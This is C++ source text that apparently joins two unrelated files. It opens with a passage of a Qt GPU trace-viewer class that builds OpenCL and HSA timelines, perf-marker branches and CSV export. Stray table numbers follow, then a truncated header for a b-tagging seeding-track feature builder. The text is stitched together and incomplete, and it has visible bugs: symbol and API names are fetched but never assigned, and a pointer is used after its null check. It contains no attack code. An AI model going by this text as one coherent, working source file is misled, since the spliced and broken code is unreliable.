GT_IF_WITH_ASSERT((pDataEnqueueOperationsInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pQueueBranch != nullptr))
{
quint64 dataSize = static_cast<quint64>(pDataEnqueueOperationsInfo->GetCLDataTransferSize());
static_cast<CLDataEnqueueOperationsTimelineItem*>(gpuItem)->setDataSize(dataSize);
commandName.prepend(CLMemTimelineItem::getDataSizeString(dataSize, 1) + " ");
}
}
else
{
gpuItem = new CLOtherEnqueueOperationsTimelineItem(startTime, endTime, pApiInfo->GetApiDisplaySequenceId());
}
APITimelineItem* newItem = new DispatchAPITimelineItem(gpuItem, pAPITimelineItem);
gpuItem->setText(commandName);
SAFE_DELETE(pAPITimelineItem);
pAPITimelineItem = newItem;
gpuItem->setBackgroundColor(pAPITimelineItem->backgroundColor());
gpuItem->setForegroundColor(Qt::white);
gpuItem->setQueueTime(gpuQueued);
gpuItem->setSubmitTime(gpuSubmit);
gpuItem->setDeviceType(deviceNameStr);
gpuItem->setCommandType(strCmdType);
gpuItem->setHostItem(pAPITimelineItem);
if (pBranchInfo->m_pFillOperationBranch == nullptr)
{
pBranchInfo->m_pFillOperationBranch = new acTimelineBranch();
pBranchInfo->m_pFillOperationBranch->setText(tr("Other Enqueue Operations"));
pBranchInfo->m_pFillOperationBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pBranchInfo->m_pQueueBranch->addSubBranch(pBranchInfo->m_pFillOperationBranch);
}
GT_IF_WITH_ASSERT(pBranchInfo->m_pFillOperationBranch != nullptr)
{
pBranchInfo->m_pFillOperationBranch->addTimelineItem(gpuItem);
}
deviceBlockItem = gpuItem;
}
}
}
}
}
if (pAPITimelineItem != nullptr)
{
hostBranch->addTimelineItem(pAPITimelineItem);
pAPITimelineItem->setTraceTableItem(tableModel->AddTopLevelTraceItem(GPU_STR_TraceViewOpenCL, apiName, pApiInfo, pAPITimelineItem, deviceBlockItem, occupancyInfo));
}
}
void TraceView::HandleHSAAPIInfo(IHSAAPIInfoDataHandler* phsaApiInfo)
{
IAPIInfoDataHandler* pApiInfo = phsaApiInfo->GetApiInfoDataHandler();
HSA_API_Type apiID = phsaApiInfo->GetHSAApiTypeId();
osThreadId threadId = pApiInfo->GetApiThreadId();
if (phsaApiInfo->IsApi())
{
TraceTableModel* tableModel = nullptr;
acTimelineItem* deviceBlockItem = nullptr;
IOccupancyInfoDataHandler* occupancyInfo = nullptr;
AGP_TODO("hook up occupancy info for HSA");
//QList<OccupancyInfo*> occInfo;
// int nOccIndex = 0;
//if (m_pCurrentSession->GetOccupancyTable().contains(threadId))
//{
// occInfo = m_pCurrentSession->GetOccupancyTable()[threadId];
// if (m_hsaThreadOccIndexMap.contains(threadId))
// {
// nOccIndex = m_hsaThreadOccIndexMap[threadId];
// }
//}
// if we already have CL data for this thread, then insert the HSA data as sub-nodes under the containing CL node, otherwise create a table map for HSA
if (m_modelMap.contains(threadId))
{
tableModel = m_modelMap[threadId];
}
else
{
tableModel = new TraceTableModel(this);
tableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, tableModel);
}
acTimelineBranch* hostBranch = GetHostBranchForAPI(threadId, GPU_STR_TraceViewHSA);
GT_ASSERT(hostBranch != nullptr);
QString apiName;
if (apiID < HSA_API_Type_Init)
{
//apiName = CLAPIDefs::Instance()->GetOpenCLAPIString(CL_FUNC_TYPE(apiID)); //TODO : add a HSA version....
apiName = QString::fromStdString(pApiInfo->GetApiNameString());
}
else
{
apiName = QString::fromStdString(pApiInfo->GetApiNameString());
}
quint64 itemStartTime = pApiInfo->GetApiStartTime();
quint64 itemEndTime = pApiInfo->GetApiEndTime();
// check for reasonable timestamps
GT_ASSERT((itemEndTime >= itemStartTime) && itemStartTime != 0);
APITimelineItem* item = nullptr;
IHSAMemoryApiInfoDataHandler* pHsaMemoryAPIInfo;
phsaApiInfo->IsHSAMemoryApi(&pHsaMemoryAPIInfo);
if (nullptr != pHsaMemoryAPIInfo)
{
unsigned int dispSeqId = pApiInfo->GetApiDisplaySequenceId();
size_t hsaMemorySize = pHsaMemoryAPIInfo->GetHSAMemoryApiSize();
item = new HSAMemoryTimelineItem(itemStartTime, itemEndTime, dispSeqId, hsaMemorySize);
IHSAMemoryTransferApiInfoDataHandler* pHsaMemoryTransferAPIInfo;
phsaApiInfo->IsHSAMemoryTransferApi(&pHsaMemoryTransferAPIInfo);
uint64_t hsaTransferStartTime = 0;
uint64_t hsaTransferEndTime = 0;
if (nullptr != pHsaMemoryTransferAPIInfo)
{
hsaTransferStartTime = pHsaMemoryTransferAPIInfo->GetHSAMemoryTransferStartTime();
hsaTransferEndTime = pHsaMemoryTransferAPIInfo->GetHSAMemoryTransferEndTime();
}
auto SplitAgentHandleAndName = [](const std::string& agentString, std::string& agentHandle , std::string& agentName)
{
std::string agentStringWithoutBraces = std::string(agentString.begin() + 1, agentString.end() - 1);
size_t agentHandleNameSeparatorPos = agentStringWithoutBraces.find(",");
if (std::string::npos != agentHandleNameSeparatorPos)
{
agentHandle = std::string(agentStringWithoutBraces.begin(), agentStringWithoutBraces.begin() + agentHandleNameSeparatorPos);
size_t nameValueseparatorPos = agentHandle.find(ATP_PARAM_VALUE_DELIMITER);
agentHandle = std::string(agentHandle.begin() + nameValueseparatorPos + 1, agentHandle.end());
agentName = std::string(agentStringWithoutBraces.begin() + agentHandleNameSeparatorPos + 1, agentStringWithoutBraces.end());
nameValueseparatorPos = agentName.find(ATP_PARAM_VALUE_DELIMITER);
agentName = std::string(agentName.begin() + nameValueseparatorPos + 1, agentName.end());
}
else
{
agentHandle = agentStringWithoutBraces;
agentName = "Unknown";
}
};
if ((nullptr != pHsaMemoryTransferAPIInfo) && (0 != hsaTransferStartTime) && (0 != hsaTransferEndTime))
{
std::string agentHandle;
std::string agentName;
std::string agentString = pHsaMemoryTransferAPIInfo->GetHSASrcAgentString();
SplitAgentHandleAndName(agentString, agentHandle, agentName);
QString srcAgentHandle = QString::fromStdString(agentHandle);
QString srcAgentName = QString::fromStdString(agentName);
agentString = pHsaMemoryTransferAPIInfo->GetHSADestinationAgentString();
SplitAgentHandleAndName(agentString, agentHandle, agentName);
QString dstAgentHandle = QString::fromStdString(agentHandle);
QString dstAgentName = QString::fromStdString(agentName);
HSAMemoryTransferTimelineItem* transferItem = new HSAMemoryTransferTimelineItem(
hsaTransferStartTime,
hsaTransferEndTime,
dispSeqId,
hsaMemorySize,
srcAgentHandle,
srcAgentName,
dstAgentHandle,
dstAgentName);
transferItem->setHostItem(item);
transferItem->setBackgroundColor(APIColorMap::Instance()->GetAPIColor(apiName, QColor(90, 90, 90)));
quint64 transferSize = hsaMemorySize;
//((CLMemTimelineItem*)gpuItem)->setDataTransferSize(transferSize);
transferItem->setText(CLMemTimelineItem::getDataSizeString(transferSize, 1) + " copy");
// Create HSA branch if it does not yet exist
if (nullptr == m_pHSABranch)
{
m_pHSABranch = new acTimelineBranch();
m_pHSABranch->SetBGColor(QColor::fromRgb(230, 230, 230));
m_pHSABranch->setText(GPU_STR_TraceViewHSA);
}
if (nullptr == m_pHSADataTransferBranch)
{
m_pHSADataTransferBranch = new acTimelineBranch();
m_pHSADataTransferBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
m_pHSADataTransferBranch->setText(GPU_STR_TraceViewHSADataTransfers);
}
acTimelineBranch* pHsaDataTransferBranch = GetHSADataTransferBranch(srcAgentHandle, dstAgentHandle);
if (nullptr == pHsaDataTransferBranch)
{
pHsaDataTransferBranch = AddHSADataTransferBranch(srcAgentHandle, srcAgentName, dstAgentHandle, dstAgentName);
}
pHsaDataTransferBranch->addTimelineItem(transferItem);
}
}
else
{
unsigned int dispSeqId = pApiInfo->GetApiDisplaySequenceId();
item = new APITimelineItem(itemStartTime, itemEndTime, dispSeqId);
}
if (nullptr != item)
{
item->setText(apiName);
item->setBackgroundColor(APIColorMap::Instance()->GetAPIColor(apiName, QColor(90, 90, 90)));
item->setForegroundColor(Qt::white);
hostBranch->addTimelineItem(item);
}
item->setTraceTableItem(tableModel->AddTraceItem(GPU_STR_TraceViewHSA, apiName, pApiInfo, item, deviceBlockItem, occupancyInfo));
}
else if (HSA_API_Type_Non_API_Dispatch == apiID)
{
IHSADispatchApiInfoDataHandler* dispatchInfo;
phsaApiInfo->IsHSADispatchApi(&dispatchInfo);
if (dispatchInfo != nullptr)
{
quint64 gpuStart = pApiInfo->GetApiStartTime();
quint64 gpuEnd = pApiInfo->GetApiEndTime();
QString kernelNameStr = QString::fromStdString(dispatchInfo->GetHSAKernelName());
QString deviceNameStr = QString::fromStdString(dispatchInfo->GetHSADeviceName());
if ((gpuEnd < gpuStart))
{
AGP_TODO("FIXME the commented out bit in the if statement")
//if (cmdType <= CL_COMMAND_TASK && (deviceNameStr != GPU_STR_TraceViewCpuDevice))
{
// if this is a kernel dispatch without valid timestamps, on a non-CPU device, then bump the
// occIndex so that subsequent dispatches are matched up with the correct occupancy info
// This fixes BUG355468
//nOccIndex++;
}
}
else
{
// setup a device row based on deviceNameStr OR m_strQueueHandle ??
acTimelineBranch* deviceBranch = nullptr;
// Create HSA branch if it does not yet exist
if (m_pHSABranch == nullptr)
{
m_pHSABranch = new acTimelineBranch();
m_pHSABranch->SetBGColor(QColor::fromRgb(230, 230, 230));
m_pHSABranch->setText(GPU_STR_TraceViewHSA);
}
unsigned int hsaQueueIndex = dispatchInfo->GetHSAQueueIndex();
if (m_hsaQueueMap.contains(hsaQueueIndex))
{
deviceBranch = m_hsaQueueMap[hsaQueueIndex];
}
else
{
deviceBranch = new acTimelineBranch();
deviceBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
QString deviceIndexStr = dispatchInfo->GetHSAQueueHandleString(); // "GetHSAQueueHandleString" is a misnomer. This function returns the device index
QString queueBranchText = QString(tr(GPU_STR_HSATraceViewQueueRow)).arg(hsaQueueIndex).arg(deviceIndexStr).arg(deviceNameStr);
deviceBranch->setText(queueBranchText);
m_hsaQueueMap[hsaQueueIndex] = deviceBranch;
}
unsigned int uiSeqId = pApiInfo->GetApiSequenceId();
HSADispatchTimelineItem* dispatchItem = new HSADispatchTimelineItem(gpuStart, gpuEnd, uiSeqId);
dispatchItem->setText(kernelNameStr);
dispatchItem->setGlobalWorkSize(QString::fromStdString(dispatchInfo->GetHSAGlobalWorkGroupSize()));
dispatchItem->setLocalWorkSize(QString::fromStdString(dispatchInfo->GetHSAWorkGroupSizeString()));
//dispatchItem->setOffset(QString::fromStdString(dispatchInfo->m_strOffset));
dispatchItem->setDeviceType(deviceNameStr);
dispatchItem->setQueueHandle(QString::fromStdString(dispatchInfo->GetHSAQueueHandleString()));
dispatchItem->setBackgroundColor(Qt::darkGreen);
dispatchItem->setForegroundColor(Qt::white);
//dispatchItem->setHostItem(item);
dispatchItem->setHostItem(nullptr);
AGP_TODO("hook up occupancy info for HSA");
//if ((nOccIndex < occInfo.count()) && Util::CheckOccupancyDeviceName(occInfo[nOccIndex]->GetDeviceName(), deviceNameStr))
//{
// occupancyInfo = occInfo[nOccIndex];
// dispatchItem->setOccupancyInfo(occupancyInfo);
// nOccIndex++;
//}
//m_hsaThreadOccIndexMap[threadId] = nOccIndex;
deviceBranch->addTimelineItem(dispatchItem);
}
}
}
}
void TraceView::HandleSymFileEntry(ISymbolFileEntryInfoDataHandler* pSymFileEntry)
{
GT_IF_WITH_ASSERT(pSymFileEntry != nullptr)
{
osThreadId threadId = pSymFileEntry->GetsymbolThreadId();
SymbolInfo* entry = nullptr;
if (!pSymFileEntry->IsStackEntryNull())
{
IStackEntryInfoDataHandler* pStackEntryInfoHandler = pSymFileEntry->GetStackEntryInfoHandler();
LineNum lineNumber = pStackEntryInfoHandler->GetLineNumber();
std::string fileName = pStackEntryInfoHandler->GetFileNameString();
if (lineNumber != static_cast<LineNum>(-1) && !fileName.empty())
{
std::string apiName;
pSymFileEntry->GetSymbolApiName();
std::string symbolName;
pStackEntryInfoHandler->GetSymbolNameString();
entry = new SymbolInfo(QString::fromStdString(apiName),
QString::fromStdString(symbolName),
QString::fromStdString(fileName),
lineNumber);
}
else
{
entry = new SymbolInfo;
}
}
else
{
entry = new SymbolInfo;
}
if (m_symbolTableMap.contains(threadId))
{
m_symbolTableMap[threadId].append(entry);
}
else
{
QList<SymbolInfo*> list;
list.append(entry);
m_symbolTableMap.insert(threadId, list);
}
}
}
acTimelineBranch* TraceView::GetPerfMarkerSubBranchHelper(const QString& name, acTimelineBranch* pParent)
{
acTimelineBranch* ret = nullptr;
GT_IF_WITH_ASSERT(pParent)
{
for (int i = 0; i < pParent->subBranchCount(); ++i)
{
acTimelineBranch* pb = pParent->getSubBranch(i);
if (pb->text() == name)
{
ret = pb;
}
}
if (ret == nullptr)
{
// Create a new branch for the added perf marker
ret = new(std::nothrow) acTimelineBranch();
ret->setParent(pParent);
ret->setText(name);
pParent->addSubBranch(ret);
}
}
return ret;
}
void TraceView::HandlePerfMarkerEntry(IPerfMarkerInfoDataHandler* pPerfMarkerEntry)
{
m_perfMarkersAdded = true;
osThreadId threadId = pPerfMarkerEntry->GetPerfMarkerThreadId();
TraceTableModel* pTableModel = nullptr;
acTimelineBranch* hostBranch = GetHostBranchForAPI(threadId, "");
GT_ASSERT(hostBranch != nullptr);
if (m_modelMap.contains(threadId))
{
pTableModel = m_modelMap[threadId];
}
else
{
pTableModel = new TraceTableModel(this);
pTableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, pTableModel);
}
unsigned long long startTime = 0;
unsigned long long endTime = 0;
IPerfMarkerBeginInfoDataHandler* pBeginMarkerEntry;
if (pPerfMarkerEntry->IsBeginPerfMarkerEntry(&pBeginMarkerEntry))
{
GT_IF_WITH_ASSERT(pBeginMarkerEntry != nullptr)
{
if (m_branchStack.count() > 0)
{
hostBranch = m_branchStack.top();
}
std::string markerGroup = pBeginMarkerEntry->GetPerfMarkerBeginInfoGroupName();
acTimelineBranch* branchToUse = GetPerfMarkerSubBranchHelper(QString::fromStdString(markerGroup), hostBranch);
if (branchToUse != hostBranch)
{
m_branchStack.push(branchToUse);
}
std::string markerName = pBeginMarkerEntry->GetPerfMarkerBeginInfoName();
m_titleStack.push(QString::fromStdString(markerName));
unsigned long long markerTimestamp = pPerfMarkerEntry->GetPerfMarkerTimestamp();
m_timestampStack.push(markerTimestamp);
// Add an item to the table:
TraceTableItem* pTableItem = pTableModel->AddTraceItem("Perf Marker", QString::fromStdString(markerName), pPerfMarkerEntry);
GT_ASSERT(pTableItem != nullptr);
}
}
else if (pPerfMarkerEntry->IsEndPerfMarkerEntry())
{
if (m_timestampStack.isEmpty())
{
Util::LogError("Invalid input perfmarker file");
return;
}
startTime = m_timestampStack.pop();
endTime = pPerfMarkerEntry->GetPerfMarkerTimestamp();
// Create the new time line item:
PerfMarkerTimelineItem* pNewItem = new PerfMarkerTimelineItem(startTime, endTime);
// Set the font and color for the perf marker item:
pNewItem->setBackgroundColor(APIColorMap::Instance()->GetPerfMarkersColor());
pNewItem->setForegroundColor(Qt::black);
pNewItem->setText(m_titleStack.pop());
// Add the timeline item to the branch:
GT_IF_WITH_ASSERT(m_branchStack.count() > 0)
{
acTimelineBranch* currentBranch = m_branchStack.pop();
currentBranch->addTimelineItem(pNewItem);
}
// Add an item to the table:
TraceTableItem* pTableItem = pTableModel->CloseLastOpenedPerfMarker(pNewItem);
GT_IF_WITH_ASSERT(pTableItem != nullptr)
{
pNewItem->setTraceTableItem(pTableItem);
}
}
else if (pPerfMarkerEntry->IsEndExPerfMarkerEntry())
{
if (m_timestampStack.isEmpty())
{
Util::LogError("Invalid input perfmarker file");
return;
}
IPerfMarkerEndExInfoDataHandler* pEndExMarkerEntry;
pPerfMarkerEntry->IsEndExPerfMarkerEntry(&pEndExMarkerEntry);
startTime = m_timestampStack.pop();
endTime = pPerfMarkerEntry->GetPerfMarkerTimestamp();
// Create the new time line item:
PerfMarkerTimelineItem* pNewItem = new PerfMarkerTimelineItem(startTime, endTime);
// Set the font and color for the perf marker item:
pNewItem->setBackgroundColor(APIColorMap::Instance()->GetPerfMarkersColor());
pNewItem->setForegroundColor(Qt::black);
std::string markerName = pEndExMarkerEntry->GetPerfMarkerEndExName();
pNewItem->setText(QString::fromStdString(markerName));
// Remove the title that was specified from the BeginPerfMarker call
m_titleStack.pop();
// Add the timeline item to the branch:
GT_IF_WITH_ASSERT(m_branchStack.count() > 0)
{
acTimelineBranch* currentBranch = m_branchStack.pop();
if (m_branchStack.count() > 0)
{
hostBranch = m_branchStack.top();
}
std::string markerGroup = pEndExMarkerEntry->GetPerfMarkerEndExGroupName();
currentBranch = GetPerfMarkerSubBranchHelper(QString::fromStdString(markerGroup), hostBranch);
currentBranch->addTimelineItem(pNewItem);
}
// Add an item to the table:
TraceTableItem* pTableItem = pTableModel->CloseLastOpenedPerfMarker(pNewItem);
GT_IF_WITH_ASSERT(pTableItem != nullptr)
{
pNewItem->setTraceTableItem(pTableItem);
}
}
}
void TraceView::DoneParsingATPFile()
{
bool timelineDataLoaded = false;
bool traceDataLoaded = false;
m_parseCallsCounter = 0;
afApplicationCommands::instance()->EndPerformancePrintout("Parsing trace file");
if (!m_hostBranchMap.isEmpty())
{
timelineDataLoaded = true;
acTimelineBranch* hostBranch = new acTimelineBranch();
hostBranch->setText(tr("Host"));
for (QMap<osThreadId, acTimelineBranch*>::const_iterator i = m_hostBranchMap.begin(); i != m_hostBranchMap.end(); ++i)
{
hostBranch->addSubBranch(*i);
}
m_pTimeline->addBranch(hostBranch);
m_hostBranchMap.clear();
}
if (!m_oclCtxMap.isEmpty())
{
timelineDataLoaded = true;
for (QMap<unsigned int, acTimelineBranch*>::const_iterator i = m_oclCtxMap.begin(); i != m_oclCtxMap.end(); ++i)
{
m_pOpenCLBranch->addSubBranch(*i);
}
m_pTimeline->addBranch(m_pOpenCLBranch);
m_oclCtxMap.clear();
}
if (!m_oclQueueMap.isEmpty())
{
timelineDataLoaded = true;
for (QMap<unsigned int, OCLQueueBranchInfo*>::iterator i = m_oclQueueMap.begin(); i != m_oclQueueMap.end(); ++i)
{
SAFE_DELETE(*i);
}
m_oclQueueMap.clear();
}
if (!m_hsaQueueMap.isEmpty() || nullptr != m_pHSADataTransferBranch)
{
timelineDataLoaded = true;
bool anySubBranchAdded = false;
for (QMap<unsigned int, acTimelineBranch*>::const_iterator i = m_hsaQueueMap.begin(); i != m_hsaQueueMap.end(); ++i)
{
m_pHSABranch->addSubBranch(*i);
anySubBranchAdded = true;
}
if (nullptr != m_pHSADataTransferBranch)
{
m_pHSABranch->addSubBranch(m_pHSADataTransferBranch);
anySubBranchAdded = true;
for (std::vector<HSADataTransferBranchInfo>::iterator it = m_hsaDataTransferBranches.begin();
it != m_hsaDataTransferBranches.end(); ++it)
{
m_pHSADataTransferBranch->addSubBranch(it->m_pTransferBranch);
}
}
if (anySubBranchAdded)
{
m_pTimeline->addBranch(m_pHSABranch);
}
m_hsaQueueMap.clear();
}
if (!m_modelMap.isEmpty())
{
traceDataLoaded = true;
for (QMap<osThreadId, TraceTableModel*>::const_iterator i = m_modelMap.begin(); i != m_modelMap.end(); ++i)
{
AddTraceTable(*i, i.key());
}
m_modelMap.clear();
}
if (!timelineDataLoaded)
{
if (!traceDataLoaded)
{
SAFE_DELETE(m_pSessionTabWidget);
//by deleting m_pSessionTabWidget dependant widgets are erased as well, thus we zero them
m_pMainSplitter = nullptr;
m_pTraceTabView = nullptr;
m_pTimeline = nullptr;
QString strError = "An error occurred when loading the Application Trace.";
QStringList excludedAPIs;
if (m_pCurrentSession->GetExcludedAPIs(excludedAPIs))
{
strError += QString(GP_Str_AppMadeNoCallsToEnabledAPI).arg(GP_Str_AppTraceAPIToTrace).arg(Util::ms_APP_TRACE_OPTIONS_PAGE);
}
QLabel* badDataLabel = new QLabel(strError);
GT_ASSERT(badDataLabel);
badDataLabel->setAlignment(Qt::AlignCenter);
m_pMainLayout->addWidget(badDataLabel);
m_pMainLayout->setContentsMargins(0, 0, 0, 0);
}
else
{
Util::ShowErrorBox(QString(GP_Str_UnableToLoadTimelineData).arg(Util::ms_ENABLE_TIMEOUT_OPTION));
}
}
}
int TraceView::GetTabIndex(const QString& strTabText)
{
int retVal = -1;
for (int tabIndex = 0; tabIndex < m_pTraceTabView->count(); tabIndex++)
{
if (m_pTraceTabView->tabText(tabIndex) == strTabText)
{
retVal = tabIndex;
break;
}
}
return retVal;
}
void TraceView::DisplaySummaryPageType(int selectedIndex)
{
GT_IF_WITH_ASSERT((m_pSummaryView != nullptr) && (m_pTraceTabView != nullptr) && (m_pSessionTabWidget != nullptr))
{
m_pSummaryView->DisplaySummaryPageType(selectedIndex);
int indexOfSummary = m_pTraceTabView->indexOf(m_pSummaryView);
m_pTraceTabView->setCurrentIndex(indexOfSummary);
// Set the summarizer as current:
m_pSessionTabWidget->setCurrentIndex(0);
}
}
void TraceView::UpdateRenamedSession(const osFilePath& oldSessionFileName, const osFilePath& newSessionFileName)
{
// Call the base class implementation
SharedSessionWindow::UpdateRenamedSession(oldSessionFileName, newSessionFileName);
}
void TraceView::OnEditCopy()
{
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
QWidget* pCurrent = m_pTraceTabView->currentWidget();
SummaryView* pSummaryView = qobject_cast<SummaryView*>(pCurrent);
if (pSummaryView != nullptr)
{
pSummaryView->OnEditCopy();
}
else
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(pCurrent);
if (pTraceTable != nullptr)
{
pTraceTable->OnEditCopy();
}
}
}
}
void TraceView::OnEditSelectAll()
{
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
QWidget* pCurrent = m_pTraceTabView->currentWidget();
SummaryView* pSummaryView = qobject_cast<SummaryView*>(pCurrent);
if (pSummaryView != nullptr)
{
pSummaryView->OnEditSelectAll();
}
else
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(pCurrent);
if (pTraceTable != nullptr)
{
pTraceTable->OnEditSelectAll();
}
}
}
}
void TraceView::DisplayItemInPropertiesView(acTimelineItem* pItem)
{
// Sanity check:
GT_IF_WITH_ASSERT(pItem != nullptr)
{
acTimelineItemToolTip itemTooltip;
pItem->tooltipItems(itemTooltip);
// Create an HTML content item:
afHTMLContent htmlContent(acQStringToGTString(pItem->text()));
for (int i = 0 ; i < itemTooltip.count(); i++)
{
// Get the current name and value:
QString name = itemTooltip.getName(i);
QString val = itemTooltip.getValue(i);
htmlContent.addHTMLItem(afHTMLContent::AP_HTML_LINE, acQStringToGTString(name), acQStringToGTString(val));
}
gtString htmlText;
htmlContent.toString(htmlText);
afApplicationCommands::instance()->propertiesView()->setHTMLText(acGTStringToQString(htmlText), nullptr);
}
}
void TraceView::OnCollapseAll()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if (pTraceTable != nullptr)
{
pTraceTable->collapseAll();
}
}
}
void TraceView::OnExpandAll()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if (pTraceTable != nullptr)
{
pTraceTable->expandAll();
}
}
}
void TraceView::OnZoomItemInTimeline()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if ((pTraceTable != nullptr) && (m_pTimeline != nullptr))
{
GT_IF_WITH_ASSERT(!pTraceTable->selectionModel()->selectedIndexes().isEmpty())
{
QModelIndex firstSelected = pTraceTable->selectionModel()->selectedIndexes().first();
TraceTableItem* pSelectedItem = static_cast<TraceTableItem*>(firstSelected.internalPointer());
GT_IF_WITH_ASSERT(pSelectedItem != nullptr)
{
m_pTimeline->ZoomToItem(pSelectedItem->GetTimelineItem(), true);
}
}
}
}
}
void TraceView::OnExportToCSV()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if (pTraceTable != nullptr)
{
// The file path for the saved CSV file:
QString csvFilePathStr;
// Build the CSV default file name:
QString fileName = QString(GPU_CSV_FileNameFormat).arg(m_pCurrentSession->m_displayName).arg(GPU_CSV_FileNameTraceView);
bool rc = afApplicationCommands::instance()->ShowQTSaveCSVFileDialog(csvFilePathStr, fileName, this);
GT_IF_WITH_ASSERT(rc)
{
// Export the web view table to a CSV file:
rc = pTraceTable->ExportToCSV(csvFilePathStr);
GT_ASSERT(rc);
}
}
}
}
TraceView::OCLQueueBranchInfo* TraceView::GetBranchInfo(unsigned int contextId, unsigned int queueId, const QString& strContextHandle, const QString& deviceNameStr, const QString& strQueueHandle)
{
OCLQueueBranchInfo* pRetVal = nullptr;
acTimelineBranch* pContextBranch = NULL;
// Create OpenCL branch if it does not yet exist
if (m_pOpenCLBranch == nullptr)
{
m_pOpenCLBranch = new acTimelineBranch();
m_pOpenCLBranch->setText(GPU_STR_TraceViewOpenCL);
}
if (m_oclCtxMap.contains(contextId))
{
pContextBranch = m_oclCtxMap[contextId];
}
else
{
pContextBranch = new acTimelineBranch();
pContextBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pContextBranch->setText(QString(tr("Context %1 (%2)")).arg(contextId).arg(strContextHandle));
m_oclCtxMap[contextId] = pContextBranch;
}
if (m_oclQueueMap.contains(queueId))
{
pRetVal = m_oclQueueMap[queueId];
}
else
{
pRetVal = new OCLQueueBranchInfo;
// Create the queue branch
pRetVal->m_pQueueBranch = new acTimelineBranch();
pRetVal->m_pQueueBranch->setText(QString(tr(GPU_STR_TraceViewQueueRow)).arg(queueId).arg(deviceNameStr).arg(strQueueHandle));
pRetVal->m_pQueueBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pRetVal->m_pKernelBranch = new acTimelineBranch();
pRetVal->m_pKernelBranch->setText(tr("Kernel Execution"));
pRetVal->m_pKernelBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pRetVal->m_pMemoryBranch = new acTimelineBranch();
pRetVal->m_pMemoryBranch->setText(tr("Data Transfer"));
pRetVal->m_pMemoryBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
// Notice:
// we do not initialize the fill operations branch by default. We only do it when there are fill operation functions
pRetVal->m_pQueueBranch->addSubBranch(pRetVal->m_pMemoryBranch);
pRetVal->m_pQueueBranch->addSubBranch(pRetVal->m_pKernelBranch);
pContextBranch->addSubBranch(pRetVal->m_pQueueBranch);
m_oclQueueMap[queueId] = pRetVal;
}
return pRetVal;
}
void TraceView::BuildWindowLayout()
{
m_pMainSplitter = new QSplitter(this);
m_pTimeline = new acTimeline(this);
m_pTraceTabView = new QTabWidget(this);
// m_findToolBar = new FindToolBarView(this);
//
m_pTraceTableContextMenu = new QMenu(this);
m_pSessionTabWidget->setTabsClosable(true);
m_pTraceTabView->setTabsClosable(false);
m_pMainSplitter->setOrientation(Qt::Vertical);
m_pMainSplitter->addWidget(m_pTimeline);
m_pMainSplitter->addWidget(m_pTraceTabView);
// addWidget(m_findToolBar);
// set the initial sizes for the timeline, trace/summary tabs, and find toolbar
QList<int> sizeList;
sizeList.append(100); // timeline
sizeList.append(100); // trace/summary tabs
// sizeList.append(10); // find toolbar
m_pMainSplitter->setSizes(sizeList);
m_pMainLayout = new QHBoxLayout(this);
m_pSessionTabWidget->addTab(m_pMainSplitter, "Application Timeline Trace");
m_pMainLayout->addWidget(m_pSessionTabWidget);
m_pMainLayout->setContentsMargins(0, 0, 0, 0);
setLayout(m_pMainLayout);
}
| 41,536 |
852 |
#ifndef RecoBTag_FeatureTools_SeedingTrackInfoBuilder_h
#define RecoBTag_FeatureTools_SeedingTrackInfoBuilder_h
#include "TrackingTools/Records/interface/TransientTrackRecord.h"
#include "TrackingTools/IPTools/interface/IPTools.h"
#include "RecoBTag/TrackProbability/interface/HistogramProbabilityEstimator.h"
namespace btagbtvdeep {
class SeedingTrackInfoBuilder {
public:
SeedingTrackInfoBuilder();
void buildSeedingTrackInfo(const reco::TransientTrack* it,
const reco::Vertex& pv,
const reco::Jet& jet, /*GlobalVector jetdirection,*/
float mass,
const std::pair<bool, Measurement1D>& ip,
const std::pair<bool, Measurement1D>& ip2d,
float jet_distance,
float jaxis_dlength,
HistogramProbabilityEstimator* m_probabilityEstimator,
bool m_computeProbabilities);
const float pt() const { return pt_; }
const float eta() const { return eta_; }
const float phi() const { return phi_; }
const float mass() const { return mass_; }
const float dz() const { return dz_; }
const float dxy() const { return dxy_; }
const float ip3d() const { return ip3D_; }
const float sip3d() const { return sip3D_; }
const float ip2d() const { return ip2D_; }
const float sip2d() const { return sip2D_; }
const float ip3d_Signed() const { return ip3D_signed_; }
const float sip3d_Signed() const { return sip3D_signed_; }
const float ip2d_Signed() const { return ip2D_signed_; }
const float sip2d_Signed() const { return sip2D_signed_; }
const float chi2reduced() const { return chi2reduced_; }
const float nPixelHits() const { return nPixelHits_; }
const float nHits() const { return nHits_; }
const float jetAxisDistance() const { return jetAxisDistance_; }
const float jetAxisDlength() const { return jetAxisDlength_; }
const float trackProbability3D() const { return trackProbability3D_; }
const float trackProbability2D() const { return trackProbability2D_; }
private:
float pt_;
float eta_;
float phi_;
float mass_;
float dz_;
float dxy_;
float ip3D_;
float sip3D_;
float ip2D_;
float sip2D_;
float ip3D_signed_;
float sip3D_signed_;
float ip2D_signed_;
float sip2D_signed_;
float chi2reduced_;
float nPixelHits_;
float nHits_;
float jetAxisDistance_;
float jetAxisDlength_;
float trackProbability3D_;
float trackProbability2D_;
};
